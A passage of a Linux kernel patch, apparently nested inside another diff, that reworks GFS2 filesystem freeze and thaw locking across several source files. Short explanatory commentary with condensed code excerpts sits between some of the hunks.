+ 	if (flags & GL_ASYNC)
+diff --git a/fs/gfs2/glock.h b/fs/gfs2/glock.h
+index 0d068f4fd7d67..f6dd94ce74998 100644
+--- a/fs/gfs2/glock.h
++++ b/fs/gfs2/glock.h
+@@ -68,14 +68,6 @@ enum {
+  * also be granted in SHARED.  The preferred state is whichever is compatible
+  * with other granted locks, or the specified state if no other locks exist.
+  *
+- * LM_FLAG_PRIORITY
+- * Override fairness considerations.  Suppose a lock is held in a shared state
+- * and there is a pending request for the deferred state.  A shared lock
+- * request with the priority flag would be allowed to bypass the deferred
+- * request and directly join the other shared lock.  A shared lock request
+- * without the priority flag might be forced to wait until the deferred
+- * requested had acquired and released the lock.
+- *
+  * LM_FLAG_NODE_SCOPE
+  * This holder agrees to share the lock within this node. In other words,
+  * the glock is held in EX mode according to DLM, but local holders on the
+@@ -86,7 +78,6 @@ enum {
+ #define LM_FLAG_TRY_1CB		0x0002
+ #define LM_FLAG_NOEXP		0x0004
+ #define LM_FLAG_ANY		0x0008
+-#define LM_FLAG_PRIORITY	0x0010
+ #define LM_FLAG_NODE_SCOPE	0x0020
+ #define GL_ASYNC		0x0040
+ #define GL_EXACT		0x0080
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index 91a542b9d81e8..bb5bc32a5eea5 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -555,47 +555,34 @@ static void inode_go_dump(struct seq_file *seq, struct gfs2_glock *gl,
+ }
+ 
+ /**
+- * freeze_go_sync - promote/demote the freeze glock
++ * freeze_go_callback - A cluster node is requesting a freeze
+  * @gl: the glock
++ * @remote: true if this came from a different cluster node
+  */
+ 
+-static int freeze_go_sync(struct gfs2_glock *gl)
++static void freeze_go_callback(struct gfs2_glock *gl, bool remote)
+ {
+-	int error = 0;
+ 	struct gfs2_sbd *sdp = gl->gl_name.ln_sbd;
++	struct super_block *sb = sdp->sd_vfs;
++
++	if (!remote ||
++	    (gl->gl_state != LM_ST_SHARED &&
++	     gl->gl_state != LM_ST_UNLOCKED) ||
++	    gl->gl_demote_state != LM_ST_UNLOCKED)
++		return;
+ 
+ 	/*
+-	 * We need to check gl_state == LM_ST_SHARED here and not gl_req ==
+-	 * LM_ST_EXCLUSIVE. That's because when any node does a freeze,
+-	 * all the nodes should have the freeze glock in SH mode and they all
+-	 * call do_xmote: One for EX and the others for UN. They ALL must
+-	 * freeze locally, and they ALL must queue freeze work. The freeze_work
+-	 * calls freeze_func, which tries to reacquire the freeze glock in SH,
+-	 * effectively waiting for the thaw on the node who holds it in EX.
+-	 * Once thawed, the work func acquires the freeze glock in
+-	 * SH and everybody goes back to thawed.
++	 * Try to get an active super block reference to prevent racing with
++	 * unmount (see super_trylock_shared()).  But note that unmount isn't
++	 * the only place where a write lock on s_umount is taken, and we can
++	 * fail here because of things like remount as well.
+ 	 */
+-	if (gl->gl_state == LM_ST_SHARED && !gfs2_withdrawn(sdp) &&
+-	    !test_bit(SDF_NORECOVERY, &sdp->sd_flags)) {
+-		atomic_set(&sdp->sd_freeze_state, SFS_STARTING_FREEZE);
+-		error = freeze_super(sdp->sd_vfs);
+-		if (error) {
+-			fs_info(sdp, "GFS2: couldn't freeze filesystem: %d\n",
+-				error);
+-			if (gfs2_withdrawn(sdp)) {
+-				atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
+-				return 0;
+-			}
+-			gfs2_assert_withdraw(sdp, 0);
+-		}
+-		queue_work(gfs2_freeze_wq, &sdp->sd_freeze_work);
+-		if (test_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags))
+-			gfs2_log_flush(sdp, NULL, GFS2_LOG_HEAD_FLUSH_FREEZE |
+-				       GFS2_LFC_FREEZE_GO_SYNC);
+-		else /* read-only mounts */
+-			atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
++	if (down_read_trylock(&sb->s_umount)) {
++		atomic_inc(&sb->s_active);
++		up_read(&sb->s_umount);
++		if (!queue_work(gfs2_freeze_wq, &sdp->sd_freeze_work))
++			deactivate_super(sb);
+ 	}
+-	return 0;
+ }
+ 
+ /**
+@@ -625,18 +612,6 @@ static int freeze_go_xmote_bh(struct gfs2_glock *gl)
+ 	return 0;
+ }
+ 
+-/**
+- * freeze_go_demote_ok
+- * @gl: the glock
+- *
+- * Always returns 0
+- */
+-
+-static int freeze_go_demote_ok(const struct gfs2_glock *gl)
+-{
+-	return 0;
+-}
+-
+ /**
+  * iopen_go_callback - schedule the dcache entry for the inode to be deleted
+  * @gl: the glock
+@@ -760,9 +735,8 @@ const struct gfs2_glock_operations gfs2_rgrp_glops = {
+ };
+ 
+ const struct gfs2_glock_operations gfs2_freeze_glops = {
+-	.go_sync = freeze_go_sync,
+ 	.go_xmote_bh = freeze_go_xmote_bh,
+-	.go_demote_ok = freeze_go_demote_ok,
++	.go_callback = freeze_go_callback,
+ 	.go_type = LM_TYPE_NONDISK,
+ 	.go_flags = GLOF_NONDISK,
+ };
+diff --git a/fs/gfs2/incore.h b/fs/gfs2/incore.h
+index d09d9892cd055..113aeb5877027 100644
+--- a/fs/gfs2/incore.h
++++ b/fs/gfs2/incore.h
+@@ -600,7 +600,7 @@ enum {
+ 	SDF_RORECOVERY		= 7, /* read only recovery */
+ 	SDF_SKIP_DLM_UNLOCK	= 8,
+ 	SDF_FORCE_AIL_FLUSH     = 9,
+-	SDF_FS_FROZEN           = 10,
++	SDF_FREEZE_INITIATOR	= 10,
+ 	SDF_WITHDRAWING		= 11, /* Will withdraw eventually */
+ 	SDF_WITHDRAW_IN_PROG	= 12, /* Withdraw is in progress */
+ 	SDF_REMOTE_WITHDRAW	= 13, /* Performing remote recovery */
+diff --git a/fs/gfs2/inode.c b/fs/gfs2/inode.c
+index 23e6962cdd6e3..04fc3e72a96e4 100644
+--- a/fs/gfs2/inode.c
++++ b/fs/gfs2/inode.c
+@@ -1907,7 +1907,7 @@ static int setattr_chown(struct inode *inode, struct iattr *attr)
+ 	kuid_t ouid, nuid;
+ 	kgid_t ogid, ngid;
+ 	int error;
+-	struct gfs2_alloc_parms ap;
++	struct gfs2_alloc_parms ap = {};
+ 
+ 	ouid = inode->i_uid;
+ 	ogid = inode->i_gid;
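
The setattr_chown() fix above is a one-liner with a real effect: the GNU C empty initializer zero-fills every member, where the previous declaration left the structure's fields holding indeterminate stack contents. A standalone sketch (the structure below is a stand-in modeled loosely on struct gfs2_alloc_parms, not the real definition):

	struct alloc_parms_like {
		unsigned long long target;
		unsigned int min_target;
		unsigned int aflags;
	};

	static void init_example(void)
	{
		struct alloc_parms_like a;	/* fields are indeterminate */
		struct alloc_parms_like b = {};	/* every field starts at 0  */

		/* Later code that reads b.aflags without assigning it sees 0;
		 * doing the same with a.aflags is undefined behaviour. */
		(void)a;
		(void)b;
	}
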
+diff --git a/fs/gfs2/lock_dlm.c b/fs/gfs2/lock_dlm.c
+index 71911bf9ab34e..884081730f9fe 100644
+--- a/fs/gfs2/lock_dlm.c
++++ b/fs/gfs2/lock_dlm.c
+@@ -222,11 +222,6 @@ static u32 make_flags(struct gfs2_glock *gl, const unsigned int gfs_flags,
+ 		lkf |= DLM_LKF_NOQUEUEBAST;
+ 	}
+ 
+-	if (gfs_flags & LM_FLAG_PRIORITY) {
+-		lkf |= DLM_LKF_NOORDER;
+-		lkf |= DLM_LKF_HEADQUE;
+-	}
+-
+ 	if (gfs_flags & LM_FLAG_ANY) {
+ 		if (req == DLM_LOCK_PR)
+ 			lkf |= DLM_LKF_ALTCW;
+diff --git a/fs/gfs2/log.c b/fs/gfs2/log.c
+index e021d5f50c231..8fd8bb8604869 100644
+--- a/fs/gfs2/log.c
++++ b/fs/gfs2/log.c
+@@ -1136,8 +1136,6 @@ void gfs2_log_flush(struct gfs2_sbd *sdp, struct gfs2_glock *gl, u32 flags)
+ 		if (flags & (GFS2_LOG_HEAD_FLUSH_SHUTDOWN |
+ 			     GFS2_LOG_HEAD_FLUSH_FREEZE))
+ 			gfs2_log_shutdown(sdp);
+-		if (flags & GFS2_LOG_HEAD_FLUSH_FREEZE)
+-			atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
+ 	}
+ 
+ out_end:
+diff --git a/fs/gfs2/ops_fstype.c b/fs/gfs2/ops_fstype.c
+index c0cf1d2d0ef5b..26a70b9676d53 100644
+--- a/fs/gfs2/ops_fstype.c
++++ b/fs/gfs2/ops_fstype.c
+@@ -434,7 +434,7 @@ static int init_locking(struct gfs2_sbd *sdp, struct gfs2_holder *mount_gh,
+ 	error = gfs2_glock_get(sdp, GFS2_FREEZE_LOCK, &gfs2_freeze_glops,
+ 			       CREATE, &sdp->sd_freeze_gl);
+ 	if (error) {
+-		fs_err(sdp, "can't create transaction glock: %d\n", error);
++		fs_err(sdp, "can't create freeze glock: %d\n", error);
+ 		goto fail_rename;
+ 	}
+ 
+@@ -1143,7 +1143,6 @@ static int gfs2_fill_super(struct super_block *sb, struct fs_context *fc)
+ 	int silent = fc->sb_flags & SB_SILENT;
+ 	struct gfs2_sbd *sdp;
+ 	struct gfs2_holder mount_gh;
+-	struct gfs2_holder freeze_gh;
+ 	int error;
+ 
+ 	sdp = init_sbd(sb);
+@@ -1260,21 +1259,19 @@ static int gfs2_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	if (!sb_rdonly(sb)) {
+ 		error = init_threads(sdp);
+-		if (error) {
+-			gfs2_withdraw_delayed(sdp);
++		if (error)
+ 			goto fail_per_node;
+-		}
+ 	}
+ 
+-	error = gfs2_freeze_lock(sdp, &freeze_gh, 0);
++	error = gfs2_freeze_lock_shared(sdp, &sdp->sd_freeze_gh, 0);
+ 	if (error)
+ 		goto fail_per_node;
+ 
+ 	if (!sb_rdonly(sb))
+ 		error = gfs2_make_fs_rw(sdp);
+ 
+-	gfs2_freeze_unlock(&freeze_gh);
+ 	if (error) {
++		gfs2_freeze_unlock(&sdp->sd_freeze_gh);
+ 		if (sdp->sd_quotad_process)
+ 			kthread_stop(sdp->sd_quotad_process);
+ 		sdp->sd_quotad_process = NULL;
+@@ -1587,7 +1584,7 @@ static int gfs2_reconfigure(struct fs_context *fc)
+ 	if ((sb->s_flags ^ fc->sb_flags) & SB_RDONLY) {
+ 		struct gfs2_holder freeze_gh;
+ 
+-		error = gfs2_freeze_lock(sdp, &freeze_gh, 0);
++		error = gfs2_freeze_lock_shared(sdp, &freeze_gh, 0);
+ 		if (error)
+ 			return -EINVAL;
+ 
+diff --git a/fs/gfs2/recovery.c b/fs/gfs2/recovery.c
+index 2bb085a72e8ee..afeda936e2beb 100644
+--- a/fs/gfs2/recovery.c
++++ b/fs/gfs2/recovery.c
+@@ -404,7 +404,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 	struct gfs2_inode *ip = GFS2_I(jd->jd_inode);
+ 	struct gfs2_sbd *sdp = GFS2_SB(jd->jd_inode);
+ 	struct gfs2_log_header_host head;
+-	struct gfs2_holder j_gh, ji_gh, thaw_gh;
++	struct gfs2_holder j_gh, ji_gh;
+ 	ktime_t t_start, t_jlck, t_jhd, t_tlck, t_rep;
+ 	int ro = 0;
+ 	unsigned int pass;
+@@ -420,10 +420,10 @@ void gfs2_recover_func(struct work_struct *work)
+ 	if (sdp->sd_args.ar_spectator)
+ 		goto fail;
+ 	if (jd->jd_jid != sdp->sd_lockstruct.ls_jid) {
+-		fs_info(sdp, "jid=%u: Trying to acquire journal lock...\n",
++		fs_info(sdp, "jid=%u: Trying to acquire journal glock...\n",
+ 			jd->jd_jid);
+ 		jlocked = 1;
+-		/* Acquire the journal lock so we can do recovery */
++		/* Acquire the journal glock so we can do recovery */
+ 
+ 		error = gfs2_glock_nq_num(sdp, jd->jd_jid, &gfs2_journal_glops,
+ 					  LM_ST_EXCLUSIVE,
+@@ -465,14 +465,14 @@ void gfs2_recover_func(struct work_struct *work)
+ 		ktime_ms_delta(t_jhd, t_jlck));
+ 
+ 	if (!(head.lh_flags & GFS2_LOG_HEAD_UNMOUNT)) {
+-		fs_info(sdp, "jid=%u: Acquiring the transaction lock...\n",
+-			jd->jd_jid);
+-
+-		/* Acquire a shared hold on the freeze lock */
++		mutex_lock(&sdp->sd_freeze_mutex);
+ 
+-		error = gfs2_freeze_lock(sdp, &thaw_gh, LM_FLAG_PRIORITY);
+-		if (error)
++		if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN) {
++			mutex_unlock(&sdp->sd_freeze_mutex);
++			fs_warn(sdp, "jid=%u: Can't replay: filesystem "
++				"is frozen\n", jd->jd_jid);
+ 			goto fail_gunlock_ji;
++		}
+ 
+ 		if (test_bit(SDF_RORECOVERY, &sdp->sd_flags)) {
+ 			ro = 1;
+@@ -496,7 +496,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 			fs_warn(sdp, "jid=%u: Can't replay: read-only block "
+ 				"device\n", jd->jd_jid);
+ 			error = -EROFS;
+-			goto fail_gunlock_thaw;
++			goto fail_gunlock_nofreeze;
+ 		}
+ 
+ 		t_tlck = ktime_get();
+@@ -514,7 +514,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 			lops_after_scan(jd, error, pass);
+ 			if (error) {
+ 				up_read(&sdp->sd_log_flush_lock);
+-				goto fail_gunlock_thaw;
++				goto fail_gunlock_nofreeze;
+ 			}
+ 		}
+ 
+@@ -522,7 +522,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 		clean_journal(jd, &head);
+ 		up_read(&sdp->sd_log_flush_lock);
+ 
+-		gfs2_freeze_unlock(&thaw_gh);
++		mutex_unlock(&sdp->sd_freeze_mutex);
+ 		t_rep = ktime_get();
+ 		fs_info(sdp, "jid=%u: Journal replayed in %lldms [jlck:%lldms, "
+ 			"jhead:%lldms, tlck:%lldms, replay:%lldms]\n",
+@@ -543,8 +543,8 @@ void gfs2_recover_func(struct work_struct *work)
+ 	fs_info(sdp, "jid=%u: Done\n", jd->jd_jid);
+ 	goto done;
+ 
+-fail_gunlock_thaw:
+-	gfs2_freeze_unlock(&thaw_gh);
++fail_gunlock_nofreeze:
++	mutex_unlock(&sdp->sd_freeze_mutex);
+ fail_gunlock_ji:
+ 	if (jlocked) {
+ 		gfs2_glock_dq_uninit(&ji_gh);
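
Journal replay no longer takes the freeze glock at all (which is also why the LM_FLAG_PRIORITY translation was dropped from lock_dlm.c above); it only has to agree with the local freeze state. The interlock, condensed from gfs2_recover_func() with the surrounding replay logic elided:

	mutex_lock(&sdp->sd_freeze_mutex);
	if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN) {
		mutex_unlock(&sdp->sd_freeze_mutex);
		goto fail_gunlock_ji;	/* refuse to replay a frozen fs */
	}
	/* ... scan and replay the journal ... */
	mutex_unlock(&sdp->sd_freeze_mutex);
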
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 6107cd680176c..aff8cdc61eff7 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -332,7 +332,12 @@ static int gfs2_lock_fs_check_clean(struct gfs2_sbd *sdp)
+ 	struct lfcc *lfcc;
+ 	LIST_HEAD(list);
+ 	struct gfs2_log_header_host lh;
+-	int error;
++	int error, error2;
++
++	/*
++	 * Grab all the journal glocks in SH mode.  We are *probably* doing
++	 * that to prevent recovery.
++	 */
+ 
+ 	list_for_each_entry(jd, &sdp->sd_jindex_list, jd_list) {
+ 		lfcc = kmalloc(sizeof(struct lfcc), GFP_KERNEL);
+@@ -349,11 +354,13 @@ static int gfs2_lock_fs_check_clean(struct gfs2_sbd *sdp)
+ 		list_add(&lfcc->list, &list);
+ 	}
+ 
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
+ 	error = gfs2_glock_nq_init(sdp->sd_freeze_gl, LM_ST_EXCLUSIVE,
+ 				   LM_FLAG_NOEXP | GL_NOPID,
+ 				   &sdp->sd_freeze_gh);
+ 	if (error)
+-		goto out;
++		goto relock_shared;
+ 
+ 	list_for_each_entry(jd, &sdp->sd_jindex_list, jd_list) {
+ 		error = gfs2_jdesc_check(jd);
+@@ -368,8 +375,14 @@ static int gfs2_lock_fs_check_clean(struct gfs2_sbd *sdp)
+ 		}
+ 	}
+ 
+-	if (error)
+-		gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++	if (!error)
++		goto out;  /* success */
++
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
++relock_shared:
++	error2 = gfs2_freeze_lock_shared(sdp, &sdp->sd_freeze_gh, 0);
++	gfs2_assert_withdraw(sdp, !error2);
+ 
+ out:
+ 	while (!list_empty(&list)) {
+@@ -463,7 +476,7 @@ static int gfs2_write_inode(struct inode *inode, struct writeback_control *wbc)
+  * @flags: The type of dirty
+  *
+  * Unfortunately it can be called under any combination of inode
+- * glock and transaction lock, so we have to check carefully.
++ * glock and freeze glock, so we have to check carefully.
+  *
+  * At the moment this deals only with atime - it should be possible
+  * to expand that role in future, once a review of the locking has
+@@ -550,15 +563,8 @@ void gfs2_make_fs_ro(struct gfs2_sbd *sdp)
+ 				   gfs2_log_is_empty(sdp),
+ 				   HZ * 5);
+ 		gfs2_assert_warn(sdp, gfs2_log_is_empty(sdp));
+-	} else {
+-		wait_event_timeout(sdp->sd_log_waitq,
+-				   gfs2_log_is_empty(sdp),
+-				   HZ * 5);
+ 	}
+ 	gfs2_quota_cleanup(sdp);
+-
+-	if (!log_write_allowed)
+-		sdp->sd_vfs->s_flags |= SB_RDONLY;
+ }
+ 
+ /**
+@@ -594,12 +600,16 @@ static void gfs2_put_super(struct super_block *sb)
+ 	} else {
+ 		gfs2_quota_cleanup(sdp);
+ 	}
++	if (gfs2_withdrawn(sdp))
++		gfs2_quota_cleanup(sdp);
+ 	WARN_ON(gfs2_withdrawing(sdp));
+ 
+ 	/*  At this point, we're through modifying the disk  */
+ 
+ 	/*  Release stuff  */
+ 
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
+ 	iput(sdp->sd_jindex);
+ 	iput(sdp->sd_statfs_inode);
+ 	iput(sdp->sd_rindex);
+@@ -654,59 +664,116 @@ static int gfs2_sync_fs(struct super_block *sb, int wait)
+ 	return sdp->sd_log_error;
+ }
+ 
+-void gfs2_freeze_func(struct work_struct *work)
++static int gfs2_freeze_locally(struct gfs2_sbd *sdp)
+ {
+-	int error;
+-	struct gfs2_holder freeze_gh;
+-	struct gfs2_sbd *sdp = container_of(work, struct gfs2_sbd, sd_freeze_work);
+ 	struct super_block *sb = sdp->sd_vfs;
++	int error;
+ 
+-	atomic_inc(&sb->s_active);
+-	error = gfs2_freeze_lock(sdp, &freeze_gh, 0);
+-	if (error) {
+-		gfs2_assert_withdraw(sdp, 0);
+-	} else {
+-		atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
+-		error = thaw_super(sb);
+-		if (error) {
+-			fs_info(sdp, "GFS2: couldn't thaw filesystem: %d\n",
+-				error);
+-			gfs2_assert_withdraw(sdp, 0);
++	atomic_set(&sdp->sd_freeze_state, SFS_STARTING_FREEZE);
++
++	error = freeze_super(sb);
++	if (error)
++		goto fail;
++
++	if (test_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags)) {
++		gfs2_log_flush(sdp, NULL, GFS2_LOG_HEAD_FLUSH_FREEZE |
++			       GFS2_LFC_FREEZE_GO_SYNC);
++		if (gfs2_withdrawn(sdp)) {
++			thaw_super(sb);
++			error = -EIO;
++			goto fail;
+ 		}
+-		gfs2_freeze_unlock(&freeze_gh);
+ 	}
++	return 0;
++
++fail:
++	atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
++	return error;
++}
++
++static int gfs2_do_thaw(struct gfs2_sbd *sdp)
++{
++	struct super_block *sb = sdp->sd_vfs;
++	int error;
++
++	error = gfs2_freeze_lock_shared(sdp, &sdp->sd_freeze_gh, 0);
++	if (error)
++		goto fail;
++	error = thaw_super(sb);
++	if (!error)
++		return 0;
++
++fail:
++	fs_info(sdp, "GFS2: couldn't thaw filesystem: %d\n", error);
++	gfs2_assert_withdraw(sdp, 0);
++	return error;
++}
++
++void gfs2_freeze_func(struct work_struct *work)
++{
++	struct gfs2_sbd *sdp = container_of(work, struct gfs2_sbd, sd_freeze_work);
++	struct super_block *sb = sdp->sd_vfs;
++	int error;
++
++	mutex_lock(&sdp->sd_freeze_mutex);
++	error = -EBUSY;
++	if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN)
++		goto freeze_failed;
++
++	error = gfs2_freeze_locally(sdp);
++	if (error)
++		goto freeze_failed;
++
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++	atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
++
++	error = gfs2_do_thaw(sdp);
++	if (error)
++		goto out;
++
++	atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
++	goto out;
++
++freeze_failed:
++	fs_info(sdp, "GFS2: couldn't freeze filesystem: %d\n", error);
++
++out:
++	mutex_unlock(&sdp->sd_freeze_mutex);
+ 	deactivate_super(sb);
+-	clear_bit_unlock(SDF_FS_FROZEN, &sdp->sd_flags);
+-	wake_up_bit(&sdp->sd_flags, SDF_FS_FROZEN);
+-	return;
+ }
+ 
+ /**
+- * gfs2_freeze - prevent further writes to the filesystem
++ * gfs2_freeze_super - prevent further writes to the filesystem
+  * @sb: the VFS structure for the filesystem
+  *
+  */
+ 
+-static int gfs2_freeze(struct super_block *sb)
++static int gfs2_freeze_super(struct super_block *sb)
+ {
+ 	struct gfs2_sbd *sdp = sb->s_fs_info;
+ 	int error;
+ 
+-	mutex_lock(&sdp->sd_freeze_mutex);
+-	if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN) {
+-		error = -EBUSY;
++	if (!mutex_trylock(&sdp->sd_freeze_mutex))
++		return -EBUSY;
++	error = -EBUSY;
++	if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN)
+ 		goto out;
+-	}
+ 
+ 	for (;;) {
+-		if (gfs2_withdrawn(sdp)) {
+-			error = -EINVAL;
++		error = gfs2_freeze_locally(sdp);
++		if (error) {
++			fs_info(sdp, "GFS2: couldn't freeze filesystem: %d\n",
++				error);
+ 			goto out;
+ 		}
+ 
+ 		error = gfs2_lock_fs_check_clean(sdp);
+ 		if (!error)
+-			break;
++			break;  /* success */
++
++		error = gfs2_do_thaw(sdp);
++		if (error)
++			goto out;
+ 
+ 		if (error == -EBUSY)
+ 			fs_err(sdp, "waiting for recovery before freeze\n");
+@@ -720,32 +787,60 @@ static int gfs2_freeze(struct super_block *sb)
+ 		fs_err(sdp, "retrying...\n");
+ 		msleep(1000);
+ 	}
+-	set_bit(SDF_FS_FROZEN, &sdp->sd_flags);
++
+ out:
++	if (!error) {
++		set_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags);
++		atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
++	}
+ 	mutex_unlock(&sdp->sd_freeze_mutex);
+ 	return error;
+ }
+ 
+ /**
+- * gfs2_unfreeze - reallow writes to the filesystem
++ * gfs2_thaw_super - reallow writes to the filesystem
+  * @sb: the VFS structure for the filesystem
+  *
+  */
+ 
+-static int gfs2_unfreeze(struct super_block *sb)
++static int gfs2_thaw_super(struct super_block *sb)
+ {
+ 	struct gfs2_sbd *sdp = sb->s_fs_info;
++	int error;
+ 
+-	mutex_lock(&sdp->sd_freeze_mutex);
+-	if (atomic_read(&sdp->sd_freeze_state) != SFS_FROZEN ||
+-	    !gfs2_holder_initialized(&sdp->sd_freeze_gh)) {
+-		mutex_unlock(&sdp->sd_freeze_mutex);
+-		return -EINVAL;
++	if (!mutex_trylock(&sdp->sd_freeze_mutex))
++		return -EBUSY;
++	error = -EINVAL;
++	if (!test_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags))
++		goto out;
++
++	atomic_inc(&sb->s_active);
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
++	error = gfs2_do_thaw(sdp);
++
++	if (!error) {
++		clear_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags);
++		atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
+ 	}
++out:
++	mutex_unlock(&sdp->sd_freeze_mutex);
++	deactivate_super(sb);
++	return error;
++}
++
++void gfs2_thaw_freeze_initiator(struct super_block *sb)
++{
++	struct gfs2_sbd *sdp = sb->s_fs_info;
++
++	mutex_lock(&sdp->sd_freeze_mutex);
++	if (!test_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags))
++		goto out;
+ 
+ 	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
++out:
+ 	mutex_unlock(&sdp->sd_freeze_mutex);
+-	return wait_on_bit(&sdp->sd_flags, SDF_FS_FROZEN, TASK_INTERRUPTIBLE);
+ }
+ 
+ /**
+@@ -1499,8 +1594,8 @@ const struct super_operations gfs2_super_ops = {
+ 	.evict_inode		= gfs2_evict_inode,
+ 	.put_super		= gfs2_put_super,
+ 	.sync_fs		= gfs2_sync_fs,
+-	.freeze_super		= gfs2_freeze,
+-	.thaw_super		= gfs2_unfreeze,
++	.freeze_super		= gfs2_freeze_super,
++	.thaw_super		= gfs2_thaw_super,
+ 	.statfs			= gfs2_statfs,
+ 	.drop_inode		= gfs2_drop_inode,
+ 	.show_options		= gfs2_show_options,
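
Taken together, the super.c changes turn freezing into a per-node state machine serialized by sd_freeze_mutex: the initiating node runs gfs2_freeze_super() and ends up holding the freeze glock in EX, while every other node reacts through freeze_go_callback() and gfs2_freeze_func(). The remote side, condensed from the functions above with error paths elided (not a compilable unit on its own):

	/* Condensed from gfs2_freeze_func(): what a non-initiating node does. */
	mutex_lock(&sdp->sd_freeze_mutex);

	gfs2_freeze_locally(sdp);		/* freeze_super() + freeze log flush */
	gfs2_freeze_unlock(&sdp->sd_freeze_gh);	/* release the shared freeze glock   */
	atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);

	/*
	 * gfs2_do_thaw() re-requests the freeze glock in SH, which blocks for
	 * as long as the initiator holds it in EX; once granted, thaw_super()
	 * runs and this node is writable again.
	 */
	gfs2_do_thaw(sdp);
	atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);

	mutex_unlock(&sdp->sd_freeze_mutex);
	deactivate_super(sdp->sd_vfs);	/* drop the ref pinned in the callback */
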
+diff --git a/fs/gfs2/super.h b/fs/gfs2/super.h
+index 58d13fd77aed5..bba58629bc458 100644
+--- a/fs/gfs2/super.h
++++ b/fs/gfs2/super.h
+@@ -46,6 +46,7 @@ extern void gfs2_statfs_change_out(const struct gfs2_statfs_change_host *sc,
+ extern void update_statfs(struct gfs2_sbd *sdp, struct buffer_head *m_bh);
+ extern int gfs2_statfs_sync(struct super_block *sb, int type);
+ extern void gfs2_freeze_func(struct work_struct *work);
++extern void gfs2_thaw_freeze_initiator(struct super_block *sb);
+ 
+ extern void free_local_statfs_inodes(struct gfs2_sbd *sdp);
+ extern struct inode *find_local_statfs_inode(struct gfs2_sbd *sdp,
+diff --git a/fs/gfs2/sys.c b/fs/gfs2/sys.c
+index d87ea98cf5350..e1fa76d4a7c22 100644
+--- a/fs/gfs2/sys.c
++++ b/fs/gfs2/sys.c
+@@ -110,7 +110,7 @@ static ssize_t status_show(struct gfs2_sbd *sdp, char *buf)
+ 		     test_bit(SDF_RORECOVERY, &f),
+ 		     test_bit(SDF_SKIP_DLM_UNLOCK, &f),
+ 		     test_bit(SDF_FORCE_AIL_FLUSH, &f),
+-		     test_bit(SDF_FS_FROZEN, &f),
++		     test_bit(SDF_FREEZE_INITIATOR, &f),
+ 		     test_bit(SDF_WITHDRAWING, &f),
+ 		     test_bit(SDF_WITHDRAW_IN_PROG, &f),
+ 		     test_bit(SDF_REMOTE_WITHDRAW, &f),
+diff --git a/fs/gfs2/util.c b/fs/gfs2/util.c
+index 48c69aa60cd17..30b8821c54ad4 100644
+--- a/fs/gfs2/util.c
++++ b/fs/gfs2/util.c
+@@ -9,6 +9,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/completion.h>
+ #include <linux/buffer_head.h>
++#include <linux/kthread.h>
+ #include <linux/crc32.h>
+ #include <linux/gfs2_ondisk.h>
+ #include <linux/delay.h>
+@@ -93,13 +94,13 @@ int check_journal_clean(struct gfs2_sbd *sdp, struct gfs2_jdesc *jd,
+ }
+ 
+ /**
+- * gfs2_freeze_lock - hold the freeze glock
++ * gfs2_freeze_lock_shared - hold the freeze glock
+  * @sdp: the superblock
+  * @freeze_gh: pointer to the requested holder
+  * @caller_flags: any additional flags needed by the caller
+  */
+-int gfs2_freeze_lock(struct gfs2_sbd *sdp, struct gfs2_holder *freeze_gh,
+-		     int caller_flags)
++int gfs2_freeze_lock_shared(struct gfs2_sbd *sdp, struct gfs2_holder *freeze_gh,
++			    int caller_flags)
+ {
+ 	int flags = LM_FLAG_NOEXP | GL_EXACT | caller_flags;
+ 	int error;
+@@ -107,7 +108,7 @@ int gfs2_freeze_lock(struct gfs2_sbd *sdp, struct gfs2_holder *freeze_gh,
+ 	error = gfs2_glock_nq_init(sdp->sd_freeze_gl, LM_ST_SHARED, flags,
+ 				   freeze_gh);
+ 	if (error && error != GLR_TRYFAILED)
+-		fs_err(sdp, "can't lock the freeze lock: %d\n", error);
++		fs_err(sdp, "can't lock the freeze glock: %d\n", error);
+ 	return error;
+ }
+ 
+@@ -124,7 +125,6 @@ static void signal_our_withdraw(struct gfs2_sbd *sdp)
+ 	struct gfs2_inode *ip;
+ 	struct gfs2_glock *i_gl;
+ 	u64 no_formal_ino;
+-	int log_write_allowed = test_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
+ 	int ret = 0;
+ 	int tries;
+ 
+@@ -152,24 +152,34 @@ static void signal_our_withdraw(struct gfs2_sbd *sdp)
+ 	 */
+ 	clear_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
